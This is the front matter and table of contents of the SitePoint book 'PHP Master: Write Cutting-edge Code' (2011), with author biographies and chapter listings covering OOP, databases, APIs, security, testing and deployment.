Uploaded by Domingo (Russss)

PHP Master

advertisement
Pantone:
CMYK:
PHP MASTER
Grey scale
WRITE CUTTING-EDGE CODE
BY LORNA MITCHELL
DAVEY SHAFIK
MATTHEW TURLAND
PANTONE Orange 021 C
PANTONE 2955 C
CMYK O, 53, 100, 0
CMYK 100, 45, 0, 37
Black 50%
Black 100%
MODERN, EFFICIENT, AND SECURE TECHNIQUES FOR PHP PROFESSIONALS
Summary of Contents
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix
1. Object Oriented Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
2. Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3. APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
4. Design Patterns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
5. Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
6. Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
7. Automated Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
8. Quality Assurance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
A. PEAR and PECL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
B. SPL: The Standard PHP Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
C. Next Steps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
PHP MASTER:
WRITE
CUTTING-EDGE
CODE
BY LORNA MITCHELL
DAVEY SHAFIK
MATTHEW TURLAND
iv
PHP Master: Write Cutting-edge Code
by Lorna Mitchell, Davey Shafik, and Matthew Turland
Copyright © 2011 SitePoint Pty. Ltd.
Product Manager: Simon Mackie
Author Image (M. Turland): Dawn Casey
Technical Editor: Tom Museth
Author Image (L. Mitchell): Sebastian
Expert Reviewer: Luke Cawood
Bergmann
Indexer: Michele Combs
Editor: Kelly Steele
Cover Designer: Alex Walker
Notice of Rights
All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted
in any form or by any means without the prior written permission of the publisher, except in the case
of brief quotations included in critical articles or reviews.
Notice of Liability
The author and publisher have made every effort to ensure the accuracy of the information herein.
However, the information contained in this book is sold without warranty, either express or implied.
Neither the authors and SitePoint Pty. Ltd., nor its dealers or distributors, will be held liable for any
damages caused either directly or indirectly by the instructions contained in this book, or by the software
or hardware products described herein.
Trademark Notice
Rather than indicating every occurrence of a trademarked name as such, this book uses the names only
in an editorial fashion and to the benefit of the trademark owner with no intention of infringement of
the trademark.
Published by SitePoint Pty. Ltd.
48 Cambridge Street, Collingwood
VIC 3066 Australia
Web: www.sitepoint.com
Email: business@sitepoint.com
ISBN 978-0-9870908-7-4 (print)
ISBN 978-0-9871530-4-3 (ebook)
Printed and bound in the United States of America
v
About Lorna Mitchell
Lorna Jane Mitchell is a PHP consultant based in Leeds, UK. She has a Masters in Electronic
Engineering, and has worked in a variety of technical roles throughout her career. She specializes in working with data and APIs. Lorna is active in the PHP community, organizing
the PHP North West conference and user group, leading the Joind.in open source project,
and speaking at conferences. She has been published in .net magazine and php|architect,
to name a couple; she also blogs regularly on her own site, http://lornajane.net.
About Davey Shafik
Davey Shafik has been working with PHP and the LAMP stack, as well as HTML, CSS, and
JavaScript for over a decade. With numerous books, articles, and conference appearances
under his belt, he enjoys teaching others any way he can. An avid photographer, he lives in
sunny Florida with his wife and six cats.
About Matthew Turland
Matthew Turland has been using PHP since 2002. He is a Zend Certified Engineer in PHP 5
and Zend Framework, has published articles in php|architect magazine, and contributed to
two books: php|architect’s Guide to Web Scraping with PHP (Toronto: NanoBooks, 2010)
and the one you’re reading now. He’s also been a speaker at php|tek, Confoo, and ZendCon.
He enjoys contributing to open source PHP projects including Zend Framework, PHPUnit,
and Phergie, as well as blogging on his website, http://matthewturland.com.
About Luke Cawood
After nearly ten years of PHP development, Luke joined the SitePoint family to work at
99designs.com, the world’s largest crowdsourced design community. Luke has a passion for
web and mobile technologies, and when not coding, enjoys music festivals and all things
food-related. He’s known to blog occasionally at http://lukecawood.com.
About Tom Museth
Tom Museth first fell in love with code while creating scrolling adventure games in BASIC
on his Commodore 64, and usability testing them on reluctant family members. He then spent
16 years as a journalist and production editor before deciding web development would be
more rewarding. He has a passion for jQuery, PHP, HTML5, and CSS3, is eagerly eyeing the
world of mobile dev, and likes to de-stress via a book, a beach, and a fishing rod.
For Kevin, who may have taught
me everything I know, and
everyone else who believed I could
do this.
—Lorna
For Grandpa Leslie, for showing
me how to be a good man, and for
my wife, Frances, for loving the
man I became because of him.
—Davey
To my parents and my wife, who
always encourage and believe in
me. And to my children and my
friends, who continue to inspire
me.
—Matthew
Table of Contents
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix
Who Should Read This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix
What’s in This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xx
Where to Find Help . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiii
The SitePoint Forums . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiii
The Book’s Website . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiii
The SitePoint Newsletters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv
The SitePoint Podcast . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv
Your Feedback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv
Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv
Lorna Mitchell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv
Davey Shafik . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxv
Matthew Turland . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxv
Conventions Used in This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxv
Code Samples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxv
Tips, Notes, and Warnings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxvii
Chapter 1
Object Oriented Programming . . . . . . . . 1
Why OOP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Vocabulary of OOP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Introduction to OOP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Declaring a Class . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Class Constructors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Instantiating an Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Autoloading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Using Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Using Static Properties and Methods . . . . . . . . . . . . . . . . . . . . . . . . . . 6
x
Objects and Namespaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Object Inheritance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Objects and Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Type Hinting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Polymorphism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Objects and References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Passing Objects as Function Parameters . . . . . . . . . . . . . . . . . . . . . . 16
Fluent Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
public, private, and protected . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
public . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
private . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
protected . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Choosing the Right Visibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Using Getters and Setters to Control Visibility . . . . . . . . . . . . . . . . . 21
Using Magic __get and __set Methods . . . . . . . . . . . . . . . . . . . . . 22
Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
SPL Countable Interface Example . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Counting Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Declaring and Using an Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Identifying Objects and Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Handling Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Why Exceptions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
Throwing Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
Extending Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
Catching Specific Types of Exception . . . . . . . . . . . . . . . . . . . . . . . . 29
Setting a Global Exception Handler . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Working with Callbacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
More Magic Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Using __call() and __callStatic() . . . . . . . . . . . . . . . . . . . . 33
xi
Printing Objects with __toString() . . . . . . . . . . . . . . . . . . . . . . . 34
Serializing Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Objective Achieved . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Chapter 2
Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
39
Persistent Data and Web Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Choosing How to Store Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Building a Recipe Website with MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
Creating the Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
PHP Database Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Connecting to MySQL with PDO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
Selecting Data from a Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Data Fetching Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Parameters and Prepared Statements . . . . . . . . . . . . . . . . . . . . . . . . 47
Binding Values and Variables to Prepared Statements . . . . . . . . . . 49
Inserting a Row and Getting Its ID . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
How many rows were inserted, updated, or deleted? . . . . . . . . . . . 52
Deleting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Dealing with Errors in PDO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Handling Problems When Preparing . . . . . . . . . . . . . . . . . . . . . . . . . 54
Handling Problems When Executing . . . . . . . . . . . . . . . . . . . . . . . . . 55
Handling Problems When Fetching . . . . . . . . . . . . . . . . . . . . . . . . . . 56
Advanced PDO Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Transactions and PDO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Stored Procedures and PDO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Designing Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
Primary Keys and Indexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
MySQL Explain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
Inner Joins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Outer Joins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
xii
Aggregate Functions and Group By . . . . . . . . . . . . . . . . . . . . . . . . . . 68
Normalizing Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
Databases—sorted! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Chapter 3
APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
73
Before You Begin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Tools for Working with APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Adding APIs into Your System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
Service-oriented Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
Data Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
Working with JSON . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Working with XML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
HTTP: HyperText Transfer Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
The HTTP Envelope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Making HTTP Requests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
HTTP Status Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
HTTP Headers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
HTTP Verbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Understanding and Choosing Service Types . . . . . . . . . . . . . . . . . . . . . . . 95
PHP and SOAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Describing a SOAP Service with a WSDL . . . . . . . . . . . . . . . . . . . . . . 97
Debugging HTTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Using Logging to Gather Information . . . . . . . . . . . . . . . . . . . . . . . 100
Inspecting HTTP Traffic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
RPC Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Consuming an RPC Service: Flickr Example . . . . . . . . . . . . . . . . . . 101
Building an RPC Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Ajax and Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
Cross-domain Requests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
Developing and Consuming RESTful Services . . . . . . . . . . . . . . . . . . . . . 114
xiii
Beyond Pretty URLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
RESTful Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Building a RESTful Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Designing a Web Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Service Provided . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Chapter 4
115
116
116
125
126
Design Patterns . . . . . . . . . . . . . . . . . . . . . . . . . . 127
What Are Design Patterns? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Choosing the Right One . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Singleton . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Traits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Factory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
Iterator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Observer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Dependency Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
Model-View-Controller . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Pattern Formation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Chapter 5
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
173
Be Paranoid . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Filter Input, Escape Output . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Filtering and Validation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Cross-site Scripting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Cross-site Request Forgery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
xiv
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Session Fixation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Session Hijacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Storing Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Brute Force Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
SSL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
The Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
The Fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Online Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200
Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200
Chapter 6
Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
203
Benchmarking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
System Tweaks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
xv
Code Caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
INI Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
File System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Installing XHProf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Installing XHGui . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
210
215
216
217
217
226
227
232
241
Automated Testing . . . . . . . . . . . . . . . . . . . . .
243
Chapter 7
Unit Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Installing PHPUnit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Writing Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Running Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246
Test Doubles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Writing Testable Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Testing for Views and Controllers . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Database Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
Database Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265
Data Sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
Assertions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Systems Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
Initial Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
Locators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Assertions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Database Integration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
xvi
Automating Writing Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Load Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
ab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Siege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Tried and Tested . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Chapter 8
279
279
280
281
283
Quality Assurance . . . . . . . . . . . . . . . . . . . . . . 285
Measuring Quality with Static Analysis Tools . . . . . . . . . . . . . . . . . . . . . 285
phploc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
phpcpd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 287
phpmd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
Coding Standards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Checking Coding Standards with PHP Code Sniffer . . . . . . . . . . . 290
Viewing Coding Standards Violations . . . . . . . . . . . . . . . . . . . . . . . 293
PHP Code Sniffer Standards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
Documentation and Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
Using phpDocumentor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
Other Documentation Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
Source Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Working with Centralized Version Control . . . . . . . . . . . . . . . . . . . 300
Using Subversion for Source Control . . . . . . . . . . . . . . . . . . . . . . . . 301
Designing Repository Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Distributed Version Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Social Tools for Coding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
Using Git for Source Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
The Repository as the Root of the Build Process . . . . . . . . . . . . . . 310
Automated Deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
Instantly Switching to a New Version . . . . . . . . . . . . . . . . . . . . . . . 311
Managing Database Changes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
Automated Deployment and Phing . . . . . . . . . . . . . . . . . . . . . . . . . 313
xvii
Ready to Deploy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Appendix A
PEAR and PECL . . . . . . . . . . . . . . . . . . . . . . . . . 317
What is PEAR? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
What is PECL? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
Installing Packages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
PEAR Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 320
Using PEAR Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Installing Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Compiling Extensions by Hand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
Creating Packages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
Package Versioning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334
Creating a Channel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Now What? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
Appendix B
SPL: The Standard PHP
Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
343
ArrayAccess and ArrayObject . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Autoloading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
Working with Directories and Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
Countable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Data Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
